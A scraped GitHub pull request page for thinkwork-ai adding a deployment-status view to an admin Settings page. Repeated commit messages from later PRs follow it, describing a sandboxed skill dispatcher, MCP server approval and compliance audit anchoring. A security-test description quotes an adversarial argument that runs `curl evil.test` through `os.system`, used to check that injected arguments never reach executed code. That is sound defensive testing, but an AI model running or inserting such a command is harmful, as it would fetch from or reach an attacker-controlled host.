feat: add deployment status to Settings page by ericodom · Pull Request #7 · thinkwork-ai/thinkwork

ericodom · 2026-04-12T21:44:58Z

Summary

Add deploymentStatus GraphQL query + resolver that reads Lambda env vars (no DB, no live AWS calls)
Add DeploymentStatus type to GraphQL schema with stage, region, services, resources, and URLs
Update Settings page with two new cards: Deployment (stage, region, account, service statuses) and Resources & URLs (S3, DB, ECR, clickable links)
Add Terraform env vars (ADMIN_URL, DOCS_URL, APPSYNC_REALTIME_URL, ECR_REPOSITORY_URL, AWS_ACCOUNT_ID) to Lambda common_env

Test plan

terraform plan confirms new env vars are added without drift
Admin app builds with no new type errors
Settings page renders Deployment and Resources cards after deploy
URLs are clickable and open in new tabs
Graceful handling when env vars are empty (rows hidden)

🤖 Generated with Claude Code

Surface deployment infrastructure info (stage, region, services, resources, URLs) on the admin Settings page via a new deploymentStatus GraphQL query that reads Lambda environment variables. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

…SI-2/3/6) (#510) Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer. ## What lands ### `container-sources/skill_session_pool.py` Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API: - `acquire(key) -> SessionHandle` (warm reuse or fresh start) - `handle.release()` - `flush_for_tenant(tenant_id)` — U12 kill-switch path - `flush_all()` — ops escape hatch - `prune_idle()` — caller decides cadence; exposed so tests advance time ### `container-sources/skill_dispatcher.py` `dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced: - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source. - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session. - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded). - Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream. SI-3 (user-scoped pool key) is enforced structurally in the pool itself. ### `test_skill_session_pool.py` — 9 cases Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all. ### `test_skill_dispatcher.py` — 9 cases Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure. ### `test_skill_dispatcher_security.py` — 6 cases Each named with its SI number so grep surfaces coverage at review time: - SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string. - SI-2: exec template byte-identical across two invocations with different args — a structural assertion that fails if anyone ever reintroduces interpolation. - SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates. - SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug. ### Wiring - `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed. - `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers. ## What this does NOT do - Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool). - Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires — extracting now would add a seam with no caller yet. - Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness. ## Test plan - [x] `uv run ... pytest` on the three new files — 24 tests green - [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green (24 new + 187 existing) - [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests) - [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts` — 9 tests green - [x] ruff import-sort clean on every new file - [x] prettier clean on every touched TS file Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

@tool

…s inert) (#511) The single `Skill(name, args)` meta-tool that U6 flips to be the sole invocation path once U7's shadow harness validates equivalence. Today it ships as inert code — the Dockerfile wildcard COPY picks it up (via U2a) and _boot_assert registers it, but server.py's live Agent(tools=...) path still routes through the existing run_skill_dispatch / composition_runner code. ## Why ship inert The plan (#7 §U4/U5/U6/U7) explicitly gates U6's cutover on U7 PASS — U7 is the shadow harness that dual-dispatches both the old and new paths on real invocations and measures divergence. Wiring U5 into the live Agent(tools=...) before U7 exists would swap the invocation path without the safety net the plan itself calls for. This PR therefore ships the module + tests and defers server.py wiring to U7. ## What lands ### `container-sources/skill_meta_tool.py` - `SessionAllowlist` — intersection of `tenant_skills ∩ template_skills ∩ ¬template_blocks ∩ ¬tenant_kill_switches` pre-computed once at Agent(tools=...). Narrow-only: a template cannot widen past what the tenant enabled (plan R6/R7). - `invoke_skill(name, args, *, ctx)` — pure entry point the Strands @tool wrapper calls. Routes script-bundle skills to U4's `dispatch_skill_script`; pure-SKILL.md skills return their body for in-prompt consumption (no sandbox roundtrip). - `build_skill_meta_tool(ctx)` — factory returning the coroutine the `@strands.tool` decorator wraps. Decoupled from the SDK so unit tests exercise the full decision tree without importing strands. - `intersect_allowed_tools(declared, session_tools)` — narrow-only intersection of a skill's declared `allowed-tools` frontmatter against the session's effective tool set. Warns on declared-but-missing so operators can spot disabled dependencies. - `SkillUnauthorized` — distinct error from `SkillNotFound` so the model cannot enumerate tenant-scoped catalog membership by probing slugs. Both raise; the audit log gets full context. ### `test_skill_meta_tool.py` — 12 cases Covers plan AE4 + every listed test scenario: - happy path: Skill("sales-prep") routes to dispatcher with correct args - nested Skill() threads the same TurnCounters through - pure-SKILL.md slug returns body, no sandbox - unknown slug → SkillNotFound - in catalog but not in session → SkillUnauthorized - SessionAllowlist triple-constraint intersection correctness - tenant kill-switch trumps template enablement (R7 precedence) - allowed-tools frontmatter narrows (never widens) past session tools - build_skill_meta_tool closure captures ctx correctly ### `_boot_assert.EXPECTED_CONTAINER_SOURCES` Adds skill_meta_tool so the Dockerfile RUN asserts it landed. ## What this PR does NOT do - Does NOT wire `Skill` into server.py's Agent(tools=...). Deferred to U7 (shadow wiring) then U6 (canonical cutover). - Does NOT drop the AGENTS.md-conditional around AgentSkills. Plan calls for this at U5 but it's entangled with the live-path swap — lands alongside the cutover. - Does NOT suppress AgentSkills' built-in `skills` tool. Same reason — suppression only makes sense once `Skill` is the canonical path. ## Test counts - `test_skill_meta_tool.py` — 12 cases - Full agent-container suite: 223 green (12 new + 211 existing) - ruff import-sort clean on new files Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U5). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

…520) Wires the admin decision surface for plugin-uploaded MCP servers. Plan §U11 lands: - `POST /api/tenants/:tenantId/mcp-servers/:serverId/approve` computes `url_hash = sha256(canonical(url, auth_config))`, sets `status='approved'` + `approved_by` + `approved_at`. - `POST /api/tenants/:tenantId/mcp-servers/:serverId/reject` clears approval metadata; reason captured in CloudWatch audit log. - `buildMcpConfigs` SQL gate narrows to `status='approved' AND enabled=true`, with an in-code defensive hash-match check for drift (grandfathered `url_hash IS NULL` rows pass through). - `applyMcpServerFieldUpdate` reverts approved rows back to `pending` on any url/auth_config mutation (SI-5). mcpUpdateServer + mcpRegisterServer upsert + DCR cache route through it; DCR stays approved by recomputing url_hash (system-internal discovery, not admin intent). - Daily EventBridge sweeper auto-rejects pending rows older than 30 days. - Admin SPA renders the approval badge and surfaces Approve / Reject buttons for pending rows; Reject accepts an optional reason. - Cognito-only client (`cognitoFetch`) for the approval routes; mirrors plugin-upload.ts's REST analogue of requireTenantAdmin. - 40 new unit tests: hash canonicalization, approve/reject handler (authz + tenant isolation), SI-5 url-swap protection, TTL sweeper, and buildMcpConfigs approved-filter behavior. Terraform wires two new handlers (`mcp-approval`, `mcp-approval-sweeper`), four new API Gateway routes, and a daily cron. No schema migration required — `status`, `url_hash`, `approved_by`, `approved_at` all landed with U3 migration 0025. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

feat: add deployment status to Settings page

…SI-2/3/6) (#510) Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer. ## What lands ### `container-sources/skill_session_pool.py` Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API: - `acquire(key) -> SessionHandle` (warm reuse or fresh start) - `handle.release()` - `flush_for_tenant(tenant_id)` — U12 kill-switch path - `flush_all()` — ops escape hatch - `prune_idle()` — caller decides cadence; exposed so tests advance time ### `container-sources/skill_dispatcher.py` `dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced: - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source. - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session. - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded). - Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream. SI-3 (user-scoped pool key) is enforced structurally in the pool itself. ### `test_skill_session_pool.py` — 9 cases Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all. ### `test_skill_dispatcher.py` — 9 cases Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure. ### `test_skill_dispatcher_security.py` — 6 cases Each named with its SI number so grep surfaces coverage at review time: - SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string. - SI-2: exec template byte-identical across two invocations with different args — a structural assertion that fails if anyone ever reintroduces interpolation. - SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates. - SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug. ### Wiring - `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed. - `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers. ## What this does NOT do - Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool). - Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires — extracting now would add a seam with no caller yet. - Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness. ## Test plan - [x] `uv run ... pytest` on the three new files — 24 tests green - [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green (24 new + 187 existing) - [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests) - [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts` — 9 tests green - [x] ruff import-sort clean on every new file - [x] prettier clean on every touched TS file Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

@tool

…s inert) (#511) The single `Skill(name, args)` meta-tool that U6 flips to be the sole invocation path once U7's shadow harness validates equivalence. Today it ships as inert code — the Dockerfile wildcard COPY picks it up (via U2a) and _boot_assert registers it, but server.py's live Agent(tools=...) path still routes through the existing run_skill_dispatch / composition_runner code. ## Why ship inert The plan (#7 §U4/U5/U6/U7) explicitly gates U6's cutover on U7 PASS — U7 is the shadow harness that dual-dispatches both the old and new paths on real invocations and measures divergence. Wiring U5 into the live Agent(tools=...) before U7 exists would swap the invocation path without the safety net the plan itself calls for. This PR therefore ships the module + tests and defers server.py wiring to U7. ## What lands ### `container-sources/skill_meta_tool.py` - `SessionAllowlist` — intersection of `tenant_skills ∩ template_skills ∩ ¬template_blocks ∩ ¬tenant_kill_switches` pre-computed once at Agent(tools=...). Narrow-only: a template cannot widen past what the tenant enabled (plan R6/R7). - `invoke_skill(name, args, *, ctx)` — pure entry point the Strands @tool wrapper calls. Routes script-bundle skills to U4's `dispatch_skill_script`; pure-SKILL.md skills return their body for in-prompt consumption (no sandbox roundtrip). - `build_skill_meta_tool(ctx)` — factory returning the coroutine the `@strands.tool` decorator wraps. Decoupled from the SDK so unit tests exercise the full decision tree without importing strands. - `intersect_allowed_tools(declared, session_tools)` — narrow-only intersection of a skill's declared `allowed-tools` frontmatter against the session's effective tool set. Warns on declared-but-missing so operators can spot disabled dependencies. - `SkillUnauthorized` — distinct error from `SkillNotFound` so the model cannot enumerate tenant-scoped catalog membership by probing slugs. Both raise; the audit log gets full context. ### `test_skill_meta_tool.py` — 12 cases Covers plan AE4 + every listed test scenario: - happy path: Skill("sales-prep") routes to dispatcher with correct args - nested Skill() threads the same TurnCounters through - pure-SKILL.md slug returns body, no sandbox - unknown slug → SkillNotFound - in catalog but not in session → SkillUnauthorized - SessionAllowlist triple-constraint intersection correctness - tenant kill-switch trumps template enablement (R7 precedence) - allowed-tools frontmatter narrows (never widens) past session tools - build_skill_meta_tool closure captures ctx correctly ### `_boot_assert.EXPECTED_CONTAINER_SOURCES` Adds skill_meta_tool so the Dockerfile RUN asserts it landed. ## What this PR does NOT do - Does NOT wire `Skill` into server.py's Agent(tools=...). Deferred to U7 (shadow wiring) then U6 (canonical cutover). - Does NOT drop the AGENTS.md-conditional around AgentSkills. Plan calls for this at U5 but it's entangled with the live-path swap — lands alongside the cutover. - Does NOT suppress AgentSkills' built-in `skills` tool. Same reason — suppression only makes sense once `Skill` is the canonical path. ## Test counts - `test_skill_meta_tool.py` — 12 cases - Full agent-container suite: 223 green (12 new + 211 existing) - ruff import-sort clean on new files Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U5). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

…520) Wires the admin decision surface for plugin-uploaded MCP servers. Plan §U11 lands: - `POST /api/tenants/:tenantId/mcp-servers/:serverId/approve` computes `url_hash = sha256(canonical(url, auth_config))`, sets `status='approved'` + `approved_by` + `approved_at`. - `POST /api/tenants/:tenantId/mcp-servers/:serverId/reject` clears approval metadata; reason captured in CloudWatch audit log. - `buildMcpConfigs` SQL gate narrows to `status='approved' AND enabled=true`, with an in-code defensive hash-match check for drift (grandfathered `url_hash IS NULL` rows pass through). - `applyMcpServerFieldUpdate` reverts approved rows back to `pending` on any url/auth_config mutation (SI-5). mcpUpdateServer + mcpRegisterServer upsert + DCR cache route through it; DCR stays approved by recomputing url_hash (system-internal discovery, not admin intent). - Daily EventBridge sweeper auto-rejects pending rows older than 30 days. - Admin SPA renders the approval badge and surfaces Approve / Reject buttons for pending rows; Reject accepts an optional reason. - Cognito-only client (`cognitoFetch`) for the approval routes; mirrors plugin-upload.ts's REST analogue of requireTenantAdmin. - 40 new unit tests: hash canonicalization, approve/reject handler (authz + tenant isolation), SI-5 url-swap protection, TTL sweeper, and buildMcpConfigs approved-filter behavior. Terraform wires two new handlers (`mcp-approval`, `mcp-approval-sweeper`), four new API Gateway routes, and a daily cron. No schema migration required — `status`, `url_hash`, `approved_by`, `approved_at` all landed with U3 migration 0025. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

…k retention) Replaces `_anchor_fn_inert` with `_anchor_fn_live`, which performs the actual S3 PutObject of per-tenant proof slices and the global anchor JSON to the WORM-locked compliance bucket. The anchor object carries an explicit `ObjectLockMode` + `ObjectLockRetainUntilDate` per-object override (mirroring the bucket-default), so the retention contract is portable across buckets and visible at the call site. Slices write under `proofs/tenant-{id}/cadence-{cadence_id}.json` (no per-object lock; bucket default applies); anchor writes last so a partial failure never publishes a verifier-discoverable commit point. Five guards land alongside the body swap: * **Deterministic cadence_id** — sha256 of canonical chain-head fingerprint, reshaped to UUIDv7 form. Same heads produce the same cadence_id, so a retry after a partial failure overwrites its own slice keys instead of orphaning slices for the full 365-day retention window. * **Merkle self-check** — `_anchor_fn_live` recomputes the root from the received leaves and asserts equality before any PutObject. Cheap insurance against latent runAnchorPass arithmetic bugs becoming WORM-locked poisoned evidence. * **Layer 2 body-swap test** — `compliance-anchor-s3-spy.test.ts` mocks S3Client.send and asserts the live function actually issues PutObjectCommand for both slices and anchor (with SHA256 checksum, SSE-KMS, and ObjectLock retention on the anchor key only). Pairs with the Layer 1 identity assertion (`getWiredAnchorFn() === _anchor_fn_live`) in the integration test. * **Sibling watchdog IAM role** — watchdog moves OFF the shared lambda role onto a dedicated role with `kms:DescribeKey` only on the bucket CMK (NOT `kms:Decrypt` — the watchdog never reads object bodies), `s3:ListBucket` prefix-conditioned on `anchors/`, and an explicit Deny on every Delete + Bypass + Lock-mutation action so future role broadening cannot turn the watchdog into a deletion vector. * **Dev-COMPLIANCE precondition** — `var.allow_compliance_in_non_prod` (default false) blocks accidentally locking a dev bucket into irreversible COMPLIANCE bytes via a stage typo. Watchdog flips to live: `mode: "live"`, ListObjectsV2 with 1000-key truncation warning, max-LastModified pick, `ComplianceAnchorGap` metric emission (suppressed on greenfield-empty bucket), heartbeat unchanged. The CloudWatch alarm cuts over: gap → `treat_missing_data = breaching` (catches both real gaps and a watchdog-down regression); a sibling heartbeat-missing alarm is born `notBreaching` so deploy-time gaps don't fire it before the first heartbeat lands (Decision #7). Operator pre-merge step: `terraform state mv` the watchdog from the for_each handler set to the new standalone resource address. Without it, the next `terraform apply` fails with ResourceConflictException on the function name. Plan documents the exact command. Plan: docs/plans/2026-05-07-012-feat-compliance-u8b-anchor-lambda-live-plan.md Master plan: docs/plans/2026-05-06-011-feat-compliance-audit-event-log-plan.md (U8b) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

…k retention) (#927) * feat(compliance): U8b — anchor Lambda live (S3 PutObject + Object Lock retention) Replaces `_anchor_fn_inert` with `_anchor_fn_live`, which performs the actual S3 PutObject of per-tenant proof slices and the global anchor JSON to the WORM-locked compliance bucket. The anchor object carries an explicit `ObjectLockMode` + `ObjectLockRetainUntilDate` per-object override (mirroring the bucket-default), so the retention contract is portable across buckets and visible at the call site. Slices write under `proofs/tenant-{id}/cadence-{cadence_id}.json` (no per-object lock; bucket default applies); anchor writes last so a partial failure never publishes a verifier-discoverable commit point. Five guards land alongside the body swap: * **Deterministic cadence_id** — sha256 of canonical chain-head fingerprint, reshaped to UUIDv7 form. Same heads produce the same cadence_id, so a retry after a partial failure overwrites its own slice keys instead of orphaning slices for the full 365-day retention window. * **Merkle self-check** — `_anchor_fn_live` recomputes the root from the received leaves and asserts equality before any PutObject. Cheap insurance against latent runAnchorPass arithmetic bugs becoming WORM-locked poisoned evidence. * **Layer 2 body-swap test** — `compliance-anchor-s3-spy.test.ts` mocks S3Client.send and asserts the live function actually issues PutObjectCommand for both slices and anchor (with SHA256 checksum, SSE-KMS, and ObjectLock retention on the anchor key only). Pairs with the Layer 1 identity assertion (`getWiredAnchorFn() === _anchor_fn_live`) in the integration test. * **Sibling watchdog IAM role** — watchdog moves OFF the shared lambda role onto a dedicated role with `kms:DescribeKey` only on the bucket CMK (NOT `kms:Decrypt` — the watchdog never reads object bodies), `s3:ListBucket` prefix-conditioned on `anchors/`, and an explicit Deny on every Delete + Bypass + Lock-mutation action so future role broadening cannot turn the watchdog into a deletion vector. * **Dev-COMPLIANCE precondition** — `var.allow_compliance_in_non_prod` (default false) blocks accidentally locking a dev bucket into irreversible COMPLIANCE bytes via a stage typo. Watchdog flips to live: `mode: "live"`, ListObjectsV2 with 1000-key truncation warning, max-LastModified pick, `ComplianceAnchorGap` metric emission (suppressed on greenfield-empty bucket), heartbeat unchanged. The CloudWatch alarm cuts over: gap → `treat_missing_data = breaching` (catches both real gaps and a watchdog-down regression); a sibling heartbeat-missing alarm is born `notBreaching` so deploy-time gaps don't fire it before the first heartbeat lands (Decision #7). Operator pre-merge step: `terraform state mv` the watchdog from the for_each handler set to the new standalone resource address. Without it, the next `terraform apply` fails with ResourceConflictException on the function name. Plan documents the exact command. Plan: docs/plans/2026-05-07-012-feat-compliance-u8b-anchor-lambda-live-plan.md Master plan: docs/plans/2026-05-06-011-feat-compliance-audit-event-log-plan.md (U8b) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(review): apply autofix feedback Drop unused drizzle-orm imports flagged by ce-code-review: - compliance-anchor.ts: `and`, `eq`, `gt`, plus the `auditEvents` schema import (raw SQL via `` sql`...` `` is the actual codepath there) - compliance-anchor.integration.test.ts: `and`, `gt`, `auditOutbox` Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(compliance): make compliance-anchor.test.ts stub anchorFn async `AnchorFn` is now `=> Promise<...>` in U8b. The timestamp-normalization test added in #925 used a sync stub, which fails typecheck against the new contract. Switch the stub to `async () => ({ anchored: false })` — test still exercises the same path (recorded_at coercion → drainer update) since runAnchorPass awaits the result either way. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

ericodom merged commit 17758b3 into main Apr 12, 2026
3 checks passed

ericodom deleted the feat/settings-deployment-status branch April 12, 2026 22:02

ericodom mentioned this pull request Apr 24, 2026

feat(U6): delete composition runner + skill_catalog.execution/mode #542

Merged

8 tasks

ericodom added a commit that referenced this pull request May 5, 2026

Merge pull request #7 from thinkwork-ai/feat/settings-deployment-status

74a9de3

feat: add deployment status to Settings page

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

feat: add deployment status to Settings page#7

feat: add deployment status to Settings page#7
ericodom merged 1 commit into
mainfrom
feat/settings-deployment-status

ericodom commented Apr 12, 2026

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

ericodom commented Apr 12, 2026

Summary

Test plan

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant